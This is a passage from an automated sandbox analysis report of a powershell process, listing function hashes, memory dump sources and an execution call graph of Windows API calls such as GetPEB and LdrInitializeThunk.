                • Opcode Fuzzy Hash: 224c13e8cf214b9c63bc6fe787900862378b41e7471e6aa5cb8aad3f9261081b
                • Instruction Fuzzy Hash: 91210778A001099FCB04CF89C9809AAF7B1FF88310B258169E919A7711C731EC51CFA0
                Function 07A79709 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80dfc0d25071771230c1805ad420f65ff72f1897746e463058da60b5879e7327
                • Instruction ID: 09868d0abff4b5aae2b13b0ccd415042c6846574e0b729ea963af45a85379b76
                • Opcode Fuzzy Hash: 80dfc0d25071771230c1805ad420f65ff72f1897746e463058da60b5879e7327
                • Instruction Fuzzy Hash: A10176B2F142220BE7781EE0281036E2742CBC3712B1400A7C8209F287CE64AC13C7E3
                Function 032BD01D Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781565730.00000000032BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_32bd000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd79235bdce1fcb60ca00e77abd48facff28cbc156397d494ecf8c408a187e5d
                • Instruction ID: bc3eccc01ea97d43e59dd68bbaa6b1c1d86aa9387c702b75dd9a574879e9fe99
                • Opcode Fuzzy Hash: fd79235bdce1fcb60ca00e77abd48facff28cbc156397d494ecf8c408a187e5d
                • Instruction Fuzzy Hash: FD01A771418340DBE7208E55C8847E7FFA8DF453B4F1C895AED484A142C6B99885CAB6
                Function 032BD01C Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781565730.00000000032BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_32bd000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 529c3935e1db1d5e720cfd99a53417a6315aad145c667d1a306d4d66476779db
                • Instruction ID: 4e49bfbc2a4b2407f1ecc3e059298603ac31580562075ce53b8576cf5c63533e
                • Opcode Fuzzy Hash: 529c3935e1db1d5e720cfd99a53417a6315aad145c667d1a306d4d66476779db
                • Instruction Fuzzy Hash: 23F06272404344AFE7108E16CCC4BA3FBA8EB51774F18C55AED585E282C279A884CAB1
                Function 033C35AF Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df8ddda5479c869bd40fce042e46d5188bbba2f1ac003f516a59d6a99d6fd1f4
                • Instruction ID: 1361e6a2ed5f018ebfb2e2fe7548ac9ea4a192d0345665bb162af7090e20e81c
                • Opcode Fuzzy Hash: df8ddda5479c869bd40fce042e46d5188bbba2f1ac003f516a59d6a99d6fd1f4
                • Instruction Fuzzy Hash: 68F0B435B00109DFCB14CBD8D884AEEF3B2FF88324B25825DD955A7650CB36AC62CB50
                Function 033C2CB6 Relevance: .0, Instructions: 29COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 03a1988401fde4e90035684fc329c14c92c3efb51900ca9af078d647d8e2dc9a
                • Instruction ID: 154246760dcd926471fddc9facc83065c8b2c63e22a36c9d6bcacd27672086ff
                • Opcode Fuzzy Hash: 03a1988401fde4e90035684fc329c14c92c3efb51900ca9af078d647d8e2dc9a
                • Instruction Fuzzy Hash: 1DF0B235A001099FDB14CB99D890AEEF7B1FF88324F248159E515A72A1C736AC62CB61
                Function 07A717F7 Relevance: .0, Instructions: 5COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba589f22d2485f9b36bef8d60bb4a44a0e018570408adea578a21ec4ad28ab0f
                • Instruction ID: 45edbafd5f73b4662516a3d4a0e6be50c8239140b1ce2a19512f83cb40938f8f
                • Opcode Fuzzy Hash: ba589f22d2485f9b36bef8d60bb4a44a0e018570408adea578a21ec4ad28ab0f
                • Instruction Fuzzy Hash: EFA001742021009B9A45EA58C995816B761AB85319728C499E9998B36ACB67E9039B80

                Non-executed Functions

                Function 033C7D18 Relevance: .2, Instructions: 238COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3a878bfa6045f772f3922cbf5eb46653fe850ca74a7ec9af481814df14a8954d
                • Instruction ID: f1a6989d750ac4d4df53c498d0f5d58cc5c5177f5e274c2ff534ee1f000e3e5a
                • Opcode Fuzzy Hash: 3a878bfa6045f772f3922cbf5eb46653fe850ca74a7ec9af481814df14a8954d
                • Instruction Fuzzy Hash: 31916C71E102899FDB10CFA9D9C479DBBF2AF88714F18812DE814AB254EB749C45CF91
                Function 032BD51C Relevance: .1, Instructions: 76COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781565730.00000000032BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_32bd000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76f2a2907f65b73f3b8b1ef2c48d844e4a1b7d165682afc8400f001daf563f84
                • Instruction ID: 4320ae0054926ae5c9ee896ff09287e33cc7270b6aedd20e3a8a0bbe0a274c8f
                • Opcode Fuzzy Hash: 76f2a2907f65b73f3b8b1ef2c48d844e4a1b7d165682afc8400f001daf563f84
                • Instruction Fuzzy Hash: C5210672514340EFDB05DF14D9C0BA6BF75FB84324F2485A9E8090B246C776D496CB62

                Execution Graph

                Execution Coverage:0.6%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:80.3%
                Total number of Nodes:619
                Total number of Limit Nodes:5
                execution_graph 8343 20949194 GetPEB 8348 20962bc0 LdrInitializeThunk 8343->8348 8345 209491f0 8346 2094921e 8345->8346 8349 20962bc0 LdrInitializeThunk 8345->8349 8348->8345 8349->8346 8754 20953194 8755 209531a9 8754->8755 8756 209531b7 8755->8756 8758 209531be 8755->8758 8761 209531f4 8758->8761 8759 2095324c GetPEB 8760 2095325f 8759->8760 8760->8756 8761->8759 8761->8760 8762 209927ee GetPEB 8761->8762 8763 209927fe 8762->8763 8763->8759 8367 2091a093 8368 2091a09c GetPEB 8367->8368 8369 2091a0ad 8367->8369 8368->8369 8370 20927290 8371 209274fe 8370->8371 8375 209272d1 8370->8375 8372 209816aa GetPEB 8377 209273ff 8372->8377 8373 209816c9 GetPEB 8374 209274f0 8373->8374 8374->8371 8384 209f5149 8374->8384 8375->8372 8375->8377 8377->8373 8377->8374 8378 20927406 8377->8378 8379 209816f2 GetPEB 8378->8379 8380 20927443 8378->8380 8379->8380 8383 20927451 8380->8383 8388 209f505b 8380->8388 8382 2098170c 8382->8382 8385 209f517b 8384->8385 8386 209f517f GetPEB 8385->8386 8387 209f518f 8385->8387 8386->8387 8387->8378 8389 209f507e 8388->8389 8390 209f5082 GetPEB 8389->8390 8391 209f5092 8389->8391 8390->8391 8391->8382 8878 2091f113 8880 2091f141 8878->8880 8879 2091f4ab 8881 2097dcca GetPEB 8879->8881 8889 2091f4b8 8879->8889 8880->8879 8894 2091f2a7 8880->8894 8902 2091f352 8880->8902 8916 2091f1a0 8880->8916 8883 2097dcd6 GetPEB 8881->8883 8881->8889 8882 2097dfa6 GetPEB 8884 2097dfb9 GetPEB 8882->8884 8883->8889 8885 2097dfce 8884->8885 8891 2091f342 8884->8891 8887 209df13e GetPEB 8885->8887 8886 2097e104 GetPEB 8888 2097e110 GetPEB 8886->8888 8886->8916 8887->8891 8888->8916 8890 2091f4e7 8889->8890 8911 2091f3ae 8889->8911 8895 2097dd77 GetPEB 8890->8895 8896 2091f514 8890->8896 8890->8916 8892 2097dfed GetPEB 8891->8892 8891->8902 8893 2097dff8 GetPEB 8892->8893 8892->8902 8893->8902 8894->8882 8894->8891 8897 2091f334 8894->8897 8894->8911 8894->8916 8898 2097dd8a GetPEB 8895->8898 8896->8898 8907 2091f51f 8896->8907 8897->8884 8897->8891 8899 2097dd9d 8898->8899 8898->8907 8924 209df13e 8899->8924 8900 2091f391 8904 2097e077 GetPEB 8900->8904 8910 2091f39c 8900->8910 8901 2097e064 GetPEB 8901->8904 8902->8900 8902->8901 8905 2097e08c 8904->8905 8904->8910 8909 2097e095 GetPEB 8905->8909 8905->8910 8906 2097e0c5 GetPEB 8906->8911 8908 2097de0f GetPEB 8907->8908 8918 2091f588 8907->8918 8912 2097de1a GetPEB 8908->8912 8908->8918 8909->8910 8910->8906 8910->8911 8911->8886 8911->8916 8912->8918 8913 2091f595 8915 2097dee1 GetPEB 8913->8915 8921 2091f5a0 8913->8921 8914 2097dece GetPEB 8914->8915 8917 2097def6 8915->8917 8915->8921 8920 2097deff GetPEB 8917->8920 8917->8921 8918->8913 8918->8914 8919 2097df35 GetPEB 8922 2091f5b7 8919->8922 8920->8921 8921->8919 8921->8922 8922->8916 8923 2097df4e GetPEB 8922->8923 8923->8916 8925 209df163 8924->8925 8926 209df18a GetPEB 8925->8926 8927 209df19a 8925->8927 8926->8927 8927->8907 8364 20962b90 LdrInitializeThunk 8587 2091821b GetPEB 8588 2091823b 8587->8588 8589 209ab214 8593 209ab23b 8589->8593 8590 209ab2ab 8591 209ab343 8590->8591 8592 209ab333 GetPEB 8590->8592 8592->8591 8593->8590 8594 209ab290 GetPEB 8593->8594 8594->8590 8392 2099e289 8393 2099e2a7 8392->8393 8395 2099e2f8 8392->8395 8394 2099e359 GetPEB 8393->8394 8393->8395 8394->8395 8595 20945004 8596 2094502f 8595->8596 8599 20945074 8595->8599 8597 20945091 GetPEB 8596->8597 8596->8599 8600 209450a7 8597->8600 8598 209450bf GetPEB 8598->8599 8600->8598 8600->8599 8764 20924180 8765 20924190 8764->8765 8766 209242a4 8764->8766 8765->8766 8767 209241a5 GetPEB 8765->8767 8767->8766 8768 209241b8 GetPEB 8767->8768 8769 209241db 8768->8769 8770 209800a4 GetPEB 8769->8770 8771 20924247 8769->8771 8770->8766 8396 20944080 8397 20944094 8396->8397 8398 209440aa 8396->8398 8398->8397 8400 2091c2b0 8398->8400 8401 2091c2bd 8400->8401 8403 2091c2e1 8400->8403 8402 20979dba GetPEB 8401->8402 8401->8403 8402->8403 8403->8397 8928 20950100 8931 20950118 8928->8931 8930 20950114 8934 20950124 8931->8934 8932 20990be2 GetPEB 8933 209501e8 8932->8933 8933->8930 8934->8932 8934->8933 8605 2096100e 8606 20961048 8605->8606 8611 20961190 8606->8611 8608 2096108d 8609 20961190 2 API calls 8608->8609 8610 209610d1 8608->8610 8609->8610 8612 209611a7 8611->8612 8613 20961265 8612->8613 8614 20961216 GetPEB 8612->8614 8613->8608 8615 20961229 8614->8615 8615->8613 8616 20961254 GetPEB 8615->8616 8616->8613 8772 2091918a 8773 2091919f 8772->8773 8775 209191c9 8772->8775 8774 209191f0 2 API calls 8773->8774 8773->8775 8774->8775 8775->8775 8935 2094510f 8936 2098b9ab 8935->8936 8937 20945147 8935->8937 8938 2098b9c3 GetPEB 8936->8938 8951 20945443 8936->8951 8937->8936 8939 20945164 8937->8939 8938->8951 8940 2094517d GetPEB 8939->8940 8941 20945195 8939->8941 8940->8941 8943 209451c6 GetPEB 8941->8943 8947 2094526c 8941->8947 8941->8951 8942 2098badc GetPEB 8945 20945455 8942->8945 8958 209451d7 8943->8958 8944 20945460 8945->8944 8946 2098bafb GetPEB 8945->8946 8946->8944 8948 2094529d GetPEB 8947->8948 8949 20945345 8947->8949 8947->8951 8962 209452ae 8948->8962 8950 20945376 GetPEB 8949->8950 8949->8951 8963 20945387 8950->8963 8951->8942 8951->8945 8952 2094524f 8952->8947 8954 2094525c GetPEB 8952->8954 8953 2094523d GetPEB 8953->8952 8954->8947 8955 20945316 GetPEB 8956 20945328 8955->8956 8956->8949 8957 20945335 GetPEB 8956->8957 8957->8949 8958->8951 8958->8952 8958->8953 8959 2098babc GetPEB 8959->8951 8960 2094542a 8960->8951 8961 20945433 GetPEB 8960->8961 8961->8951 8962->8951 8962->8955 8962->8956 8963->8951 8963->8959 8963->8960 8404 209f4080 8412 209f40a5 8404->8412 8405 209f43f1 8406 209f4187 GetPEB 8406->8412 8407 209f420c GetPEB 8407->8412 8408 209f41e4 GetPEB 8408->8412 8409 209f43ac GetPEB 8409->8412 8410 209f426a GetPEB 8410->8412 8411 209f438e GetPEB 8411->8412 8412->8405 8412->8406 8412->8407 8412->8408 8412->8409 8412->8410 8412->8411 8413 209f436b GetPEB 8412->8413 8413->8412 8414 2095b28a 8415 2095b2a3 8414->8415 8417 2095b2b7 8414->8417 8418 20962b90 LdrInitializeThunk 8415->8418 8418->8417 8964 2092510d 8965 20925119 8964->8965 8966 20925187 8965->8966 8967 2092513e GetPEB 8965->8967 8967->8966 8968 20925151 8967->8968 8968->8966 8970 2095d0f0 8968->8970 8971 2095d101 8970->8971 8975 2095d135 8970->8975 8972 2095d107 GetPEB 8971->8972 8971->8975 8973 2095d116 8972->8973 8972->8975 8974 209989ba GetPEB 8973->8974 8973->8975 8974->8975 8975->8966 8619 209dc03d 8622 209dc068 8619->8622 8620 209dc08c 8622->8620 8623 209db0af 8622->8623 8625 209db0d9 8623->8625 8626 209db0e2 8623->8626 8624 209db313 GetPEB 8624->8625 8625->8622 8626->8624 8626->8625 8419 209fb2bc GetPEB 8422 209fb306 8419->8422 8420 209fb54c 8421 209fb53b GetPEB 8421->8420 8423 209fb508 8422->8423 8424 209fb3c8 GetPEB 8422->8424 8423->8420 8423->8421 8426 209fb3ed 8424->8426 8425 209fb4f7 GetPEB 8425->8423 8426->8423 8426->8425 8629 20950030 8632 20950044 8629->8632 8631 20950040 8633 2095005c 8632->8633 8635 209500a3 8632->8635 8634 2095008f GetPEB 8633->8634 8633->8635 8634->8635 8635->8631 8636 20968230 8637 20968250 8636->8637 8638 20968270 8637->8638 8639 20968266 RtlDebugPrintTimes 8637->8639 8639->8638 8640 209e6035 8641 209e605d 8640->8641 8643 209e60f3 8640->8643 8642 209e60d0 RtlDebugPrintTimes 8641->8642 8641->8643 8642->8643 8780 2091e1a0 8781 2091e1ac 8780->8781 8783 2091e1ec 8780->8783 8782 2097d71e RtlDebugPrintTimes 8781->8782 8781->8783 8784 2097d73b 8782->8784 8784->8784 8785 2095e1a4 8787 2095e1d9 8785->8787 8786 2095e1ed GetPEB 8790 2095e201 8786->8790 8787->8786 8788 2095e310 8787->8788 8789 2095e2fe GetPEB 8789->8788 8790->8788 8790->8789 8976 20928120 8977 20981a7f 8976->8977 8978 2092814b 8976->8978 8977->8978 8979 20981aa9 RtlDebugPrintTimes 8977->8979 8979->8978 8350 209600a5 8351 209600dd 8350->8351 8357 20960247 8350->8357 8352 209601dd GetPEB 8351->8352 8353 209601e6 8351->8353 8351->8357 8352->8353 8353->8357 8358 20962d10 LdrInitializeThunk 8353->8358 8355 20960218 8355->8357 8359 209f32c9 8355->8359 8358->8355 8360 209ca810 8359->8360 8361 209f32e3 GetPEB 8360->8361 8362 209f32f6 8361->8362 8362->8357 8791 2094b1a0 8792 2094b1af 8791->8792 8795 2094b1e0 8792->8795 8794 2094b1d1 8797 2094b233 8795->8797 8802 2094b568 8795->8802 8796 2094b2ac GetPEB 8800 2094b2c2 8796->8800 8797->8796 8797->8800 8797->8802 8798 2094b5c0 GetPEB 8803 2094b5d7 8798->8803 8799 2094b550 8799->8798 8799->8802 8800->8799 8801 2094b45d GetPEB 8800->8801 8804 2094b471 8801->8804 8802->8794 8803->8802 8805 2094b6f1 GetPEB 8803->8805 8806 2094b6df GetPEB 8803->8806 8804->8799 8804->8802 8808 2094b53c GetPEB 8804->8808 8809 2094b52a GetPEB 8804->8809 8805->8802 8807 2094b6ed 8806->8807 8807->8805 8808->8799 8810 2094b538 8809->8810 8810->8808 8644 2095e022 8645 20961190 2 API calls 8644->8645 8646 2095e065 8645->8646 8435 209cf0a5 8436 209cf0b1 8435->8436 8437 209cf0c9 RtlDebugPrintTimes 8436->8437 8439 209cf0e3 8436->8439 8438 209cf0de 8437->8438 8439->8438 8440 209cf350 GetPEB 8439->8440 8445 209cf153 8439->8445 8440->8438 8441 209cf35b GetPEB 8440->8441 8441->8438 8442 209cf241 GetPEB 8443 209cf2be 8442->8443 8444 209cf252 8442->8444 8443->8438 8447 209cf2f9 GetPEB 8443->8447 8446 209cf257 GetPEB 8444->8446 8450 209cf271 8444->8450 8445->8438 8445->8442 8446->8450 8448 209cf304 GetPEB 8447->8448 8447->8450 8448->8450 8449 209cf295 GetPEB 8449->8438 8450->8449 8451 209442af 8452 209442ca 8451->8452 8454 2098b45b 8451->8454 8453 209442db GetPEB 8452->8453 8452->8454 8456 209442f1 8453->8456 8455 20944394 GetPEB 8457 209443a5 8455->8457 8456->8454 8456->8455 8980 20957128 8981 20994351 8980->8981 8984 20957138 8980->8984 8982 20994357 GetPEB 8981->8982 8983 20994366 8981->8983 8982->8983 8984->8981 8985 20957152 GetPEB 8984->8985 8985->8981 8986 20957165 8985->8986 8458 209192af 8459 209192c4 RtlDebugPrintTimes 8458->8459 8460 209192dd 8458->8460 8459->8460 8461 209192eb GetPEB 8460->8461 8462 209192ff 8460->8462 8461->8462 8651 20919050 8653 20919068 8651->8653 8652 209190a5 8655 209190c8 8652->8655 8663 209190f8 8652->8663 8653->8652 8653->8655 8657 209191f0 8653->8657 8658 2097b8b6 GetPEB 8657->8658 8659 2091922c 8657->8659 8660 2097b8d6 8658->8660 8659->8652 8661 2097b913 GetPEB 8660->8661 8662 2097b924 8660->8662 8661->8662 8666 20919115 8663->8666 8669 20919181 8663->8669 8664 2097b850 GetPEB 8665 2097b85c GetPEB 8664->8665 8664->8669 8665->8669 8666->8664 8667 2097b813 GetPEB 8666->8667 8666->8669 8668 2097b81f GetPEB 8667->8668 8667->8669 8668->8669 8669->8655 8463 2093b0d0 8464 2093b0ed 8463->8464 8465 2093b10f GetPEB 8464->8465 8466 2093b132 8464->8466 8468 2093b179 8464->8468 8465->8466 8466->8468 8469 209301c0 GetPEB 8466->8469 8470 209301d1 8469->8470 8471 20984a6b 8469->8471 8470->8468 8471->8470 8472 20984a74 GetPEB 8471->8472 8472->8468 8670 20921051 8673 209210a3 8670->8673 8671 20921135 RtlDebugPrintTimes 8672 2092115d 8671->8672 8674 2097f397 GetPEB 8673->8674 8675 2097f385 GetPEB 8673->8675 8677 20921122 8673->8677 8674->8677 8676 20933bc0 8675->8676 8676->8674 8677->8671 8677->8672 8473 2095b0dd 8477 2095b117 8473->8477 8474 20996f09 RtlDebugPrintTimes 8476 20996f21 8474->8476 8475 2095b186 8476->8476 8477->8475 8477->8477 8478 20996d68 8477->8478 8480 2095b172 8477->8480 8478->8475 8479 20996dd1 RtlDebugPrintTimes 8478->8479 8479->8478 8480->8474 8480->8475 8987 209f3157 8989 209f3179 8987->8989 8988 209f319f GetPEB 8990 209f31b3 8988->8990 8989->8988 8993 209f325f 8989->8993 8991 209f31d3 GetPEB 8990->8991 8994 209f31fb 8990->8994 8991->8994 8992 209f3281 GetPEB 8992->8994 8993->8992 8993->8994 8995 2095415f GetPEB 8996 20954177 8995->8996 8998 20954194 8996->8998 8999 209541bb 8996->8999 9000 209541e1 8999->9000 9001 20954235 GetPEB 9000->9001 9004 209542f2 9000->9004 9002 2095424c 9001->9002 9003 20954275 GetPEB 9002->9003 9002->9004 9005 20954289 9003->9005 9004->8998 9005->9004 9006 20992e62 GetPEB 9005->9006 9006->9004 8481 2091b0c0 8484 2091b0d6 8481->8484 8483 2091b0d2 8485 2091b0e9 8484->8485 8493 2091b1ab 8485->8493 8497 2095d060 8485->8497 8487 2091b0ff 8488 2097cb82 8487->8488 8489 2091b11b GetPEB 8487->8489 8491 2091b124 8487->8491 8490 2097cb9c GetPEB 8488->8490 8488->8493 8489->8491 8490->8493 8492 2091b13b GetPEB 8491->8492 8491->8493 8494 2091b14f 8492->8494 8493->8483 8494->8488 8495 2091b15a 8494->8495 8495->8493 8496 2091b198 GetPEB 8495->8496 8496->8493 8498 2095d074 8497->8498 8500 2095d09b 8497->8500 8501 20968170 8498->8501 8500->8487 8502 20968190 8501->8502 8503 2096819e RtlDebugPrintTimes 8502->8503 8504 209681a8 8502->8504 8503->8504 8504->8500 8505 209432c5 8507 209432de 8505->8507 8506 20943323 8507->8506 8508 20943312 GetPEB 8507->8508 8508->8506 8815 209181c0 8816 209181d2 8815->8816 8816->8816 8817 209181e7 8816->8817 8819 209181eb 8816->8819 8822 209181fa 8819->8822 8823 2097b300 8819->8823 8820 209181ff GetPEB 8821 20918210 8820->8821 8821->8817 8822->8820 8823->8823 9007 209b314a 9008 209b319b 9007->9008 9009 209b31a4 GetPEB 9008->9009 9010 209b31b4 9008->9010 9009->9010 9011 209b31c9 GetPEB 9010->9011 9012 209b31d9 9010->9012 9011->9012 9013 209b3232 GetPEB 9012->9013 9014 209b325e 9012->9014 9015 209b3241 9012->9015 9013->9015 9015->9014 9016 209b324f GetPEB 9015->9016 9016->9014 8824 209351c0 8825 2093523e 8824->8825 8826 20935306 8825->8826 8830 2093559f 8825->8830 8834 20935508 8825->8834 8827 20935399 GetPEB 8826->8827 8828 20986b1d GetPEB 8826->8828 8833 209353ad 8826->8833 8827->8833 8829 20986b31 8828->8829 8829->8827 8831 209531be 2 API calls 8830->8831 8830->8834 8831->8830 8832 209354f7 GetPEB 8832->8834 8833->8832 8833->8834 8835 20986bd7 GetPEB 8833->8835 8836 20986be8 8835->8836 8836->8832 8678 20929046 8679 20929055 8678->8679 8684 209290fd 8679->8684 8688 2093a170 8679->8688 8681 2092913b 8682 20982345 RtlDebugPrintTimes 8681->8682 8681->8684 8685 20982368 8682->8685 8683 20982465 RtlDebugPrintTimes ReleaseActCtx 8683->8684 8685->8684 8686 2093a170 RtlDebugPrintTimes 8685->8686 8687 209823e7 8685->8687 8686->8687 8687->8683 8687->8684 8691 2093a195 8688->8691 8689 2093a387 8689->8681 8690 2093a5a1 RtlDebugPrintTimes 8690->8689 8691->8689 8691->8690 8509 209532c0 8511 209532d7 8509->8511 8514 20953370 8509->8514 8510 2099283a GetPEB 8510->8514 8512 2095331b GetPEB 8511->8512 8513 20953332 8511->8513 8511->8514 8512->8513 8513->8510 8513->8514 9017 2091a147 9023 2091a1a0 9017->9023 9018 2097c1e0 9019 2097c1e4 GetPEB 9018->9019 9020 2091a1d1 9018->9020 9019->9020 9021 2097c0e2 GetPEB 9021->9023 9022 2097c0d1 GetPEB 9022->9023 9023->9018 9023->9020 9023->9021 9023->9022 8694 20927072 8702 20927095 8694->8702 8695 209270f0 8696 209270fa 8695->8696 8697 20981602 8695->8697 8708 20927007 8696->8708 8700 20981619 8697->8700 8701 20981609 RtlDebugPrintTimes 8697->8701 8698 209815ac GetPEB 8705 20927122 8698->8705 8701->8700 8702->8698 8704 209270ea 8702->8704 8702->8705 8703 20927104 8704->8695 8706 209815ed RtlDebugPrintTimes 8704->8706 8705->8704 8707 209815d8 RtlDebugPrintTimes 8705->8707 8706->8695 8707->8704 8710 2092701d 8708->8710 8709 2092703b 8709->8703 8710->8709 8713 2094f1f0 8710->8713 8712 20978f22 8712->8712 8714 2094f21f 8713->8714 8715 2098fe72 GetPEB 8714->8715 8716 2094f22c 8714->8716 8715->8716 8717 2094f237 8716->8717 8718 2098fea5 GetPEB 8716->8718 8717->8712 8718->8717 8837 209301f1 8838 20930217 8837->8838 8839 20984a81 8837->8839 8838->8839 8844 2093025c GetPEB 8838->8844 8840 20930277 8839->8840 8841 20984aa1 GetPEB 8839->8841 8842 20930285 8840->8842 8843 20984ab4 GetPEB 8840->8843 8841->8840 8843->8842 8844->8839 8844->8840 8719 20926074 8721 2092607e 8719->8721 8720 20980a35 GetPEB 8722 20980a53 8720->8722 8721->8720 8724 20926121 8721->8724 8723 20980a7d GetPEB 8722->8723 8722->8724 8723->8724 8515 2091c0f6 8517 2091c10d 8515->8517 8516 2091c11c 8517->8516 8518 2097d43a GetPEB 8517->8518 8518->8516 8845 209e61f9 RtlDebugPrintTimes 8846 209e6229 8845->8846 8519 209302f9 8520 20930324 8519->8520 8521 20984ad9 GetPEB 8520->8521 8522 20930331 8520->8522 8521->8522 8523 20930341 8522->8523 8524 20984af5 GetPEB 8522->8524 8525 20984b11 GetPEB 8523->8525 8526 2093034e 8523->8526 8531 20984b4f 8523->8531 8524->8523 8528 20984b24 GetPEB 8525->8528 8527 20930359 8526->8527 8526->8528 8528->8527 8529 20984b37 8528->8529 8530 20984b40 GetPEB 8529->8530 8529->8531 8530->8531 8531->8527 8532 20984bac GetPEB 8531->8532 8533 20984bf1 8532->8533 8533->8527 8534 20984c89 8533->8534 8535 20984c7a GetPEB 8533->8535 8536 20984c9f GetPEB 8534->8536 8535->8534 8536->8527 9024 20926179 9025 2092618d 9024->9025 9028 20980b44 9024->9028 9026 209261c2 9025->9026 9027 209261a7 GetPEB 9025->9027 9027->9026 9028->9028 9029 2097717a 9030 20977229 9029->9030 9034 209771a0 9029->9034 9031 209774ac 9030->9031 9032 2097749c GetPEB 9030->9032 9030->9034 9033 209774b8 GetPEB 9031->9033 9031->9034 9032->9031 9033->9034 8537 209e70f1 8539 209e711b 8537->8539 8538 209e71b3 RtlDebugPrintTimes 8540 209e71d6 8538->8540 8539->8538 8541 209e720c RtlDebugPrintTimes 8540->8541 8544 209e71dd 8540->8544 8543 209e7228 8541->8543 8542 209e7261 RtlDebugPrintTimes 8542->8544 8543->8542 8543->8544 8847 209fa1f0 8848 209fa229 8847->8848 8849 209fa236 RtlDebugPrintTimes 8848->8849 8850 209fa265 8849->8850 8851 209fa2d5 RtlDebugPrintTimes 8850->8851 8852 209fa303 RtlDebugPrintTimes 8850->8852 8853 209fa41d 8850->8853 8856 209fa326 RtlDebugPrintTimes 8850->8856 8859 209fa3a7 8850->8859 8851->8850 8852->8850 8854 209fa40b RtlDebugPrintTimes 8854->8853 8855 209fa450 RtlDebugPrintTimes 8855->8859 8856->8850 8857 209fa476 RtlDebugPrintTimes 8857->8859 8858 209fa495 RtlDebugPrintTimes 8858->8859 8859->8853 8859->8854 8859->8855 8859->8857 8859->8858 8545 209172e0 8546 209172f4 8545->8546 8548 20917333 8545->8548 8547 2091730f GetPEB 8546->8547 8546->8548 8547->8548 8725 20917060 8728 20917090 8725->8728 8731 209170bd 8728->8731 8733 209170d0 8731->8733 8734 2091707a 8731->8734 8732 209170d9 RtlDebugPrintTimes 8732->8733 8733->8732 8733->8734 8549 2092a2e0 GetPEB 8550 209829f4 8549->8550 8552 2092a32f 8549->8552 8551 209829fd GetPEB 8550->8551 8550->8552 8551->8552 8553 20982a19 GetPEB 8552->8553 8555 2092a33d 8552->8555 8553->8555 8554 2092a50e GetPEB 8556 20982b11 8554->8556 8560 2092a523 8554->8560 8555->8554 8558 20982b05 8555->8558 8563 2092a1e3 GetPEB 8555->8563 8557 20982b1a GetPEB 8556->8557 8556->8560 8557->8560 8558->8554 8561 20982b36 GetPEB 8560->8561 8562 2092a531 8560->8562 8561->8562 8564 20982965 8563->8564 8566 2092a238 8563->8566 8565 2098296d GetPEB 8564->8565 8564->8566 8565->8566 8567 20982989 GetPEB 8566->8567 8569 2092a248 8566->8569 8567->8569 8568 209829ae GetPEB 8570 2092a2c1 8568->8570 8569->8568 8569->8570 8571 2092a280 8569->8571 8570->8571 8572 209829cb GetPEB 8570->8572 8571->8555 8572->8571 8573 209282e0 GetPEB 8574 20928319 8573->8574 8577 20928345 8573->8577 8575 20928331 GetPEB 8574->8575 8574->8577 8575->8577 8576 209283fa GetPEB 8578 2092841a 8576->8578 8579 20928434 8576->8579 8577->8576 8577->8577 8577->8579 8578->8579 8580 20981c8f GetPEB 8578->8580 8580->8579 8866 209291e5 8867 2092921d 8866->8867 8868 209824b3 GetPEB 8867->8868 8869 20929225 8867->8869 8868->8869 8870 20929233 8869->8870 8871 209824cf GetPEB 8869->8871 8871->8870 8872 209ab1e2 8873 209ab20d 8872->8873 8874 209ab1f7 8872->8874 8877 20962b90 LdrInitializeThunk 8874->8877 8876 209ab20b 8877->8876 8735 209c9060 8736 209c90ab 8735->8736 8737 209c90c0 8736->8737 8738 209c9109 8736->8738 8741 209c9215 8736->8741 8739 209c90e6 8737->8739 8740 209c9113 GetPEB 8737->8740 8753 209e92ab GetPEB 8739->8753 8745 209c90f3 8740->8745 8741->8738 8743 209c929c RtlDebugPrintTimes 8741->8743 8749 209c92af 